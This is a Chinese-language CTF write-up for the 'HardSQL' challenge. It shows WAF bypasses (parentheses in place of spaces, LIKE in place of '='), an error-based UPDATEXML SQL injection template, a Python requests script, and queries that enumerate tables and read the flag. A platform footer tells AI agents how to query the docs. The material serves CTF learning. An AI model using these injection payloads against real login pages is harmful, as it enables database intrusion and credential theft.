# HardSQL

fuzz一下，发现相对之前的EasySQL，多了几个关键字符的过滤，其中还有对于空格字符的过滤，注释语句在WAF中也被过滤了。

尝试报错注入，先写报错语句模板：

```
sql = "admin%27or(UPDATEXML(1,CONCAT(0x7e,{},0x7e),1))%23".format(p)
```

对于关键处的过滤，采取两种绕过方式：

* 对变量的空格使用()替代。
* 对=处使用like()语句代替。

上SQL注入脚本：

```
import requests

# p语句为要执行注入的命令
sql = "admin%27or(UPDATEXML(1,concat(0x7e,{},0x7e),1))%23".format(p)
print(sql)


url = "http://640faddd-30eb-4d14-9cc0-4ff5880dbbcd.node3.buuoj.cn/check.php?username={}&password=123123".format(sql)

payload = {}
headers = {}

response = requests.request("GET", url, headers=headers, data=payload)

print(response.text.encode('utf8'))
```

p语句修改为我们要使用的注入语句，注意不能使用空格。

读数据库：

```
p = "(SELECT(database()))"
```

读表：

```
p = "(SELECT(group_concat(table_name))FROM(information_schema.tables)WHERE(table_schema)LIKE('geek'))"
```

读字段：

```
p = "(SELECT(group_concat(column_name))FROM(information_schema.columns)WHERE(table_name)LIKE('H4rDsq1'))"
```

读字段内容：

```
p = "(SELECT(password)FROM(geek.H4rDsq1))"
```

flag超出字段长度，修改一下重新读取后半段。

```
p = "(SELECT(right(password,32))FROM(geek.H4rDsq1))"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook-88.gitbook.io/ctf-writeup/2019/2019-ji-ke-da-tiao-zhan/hardsql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.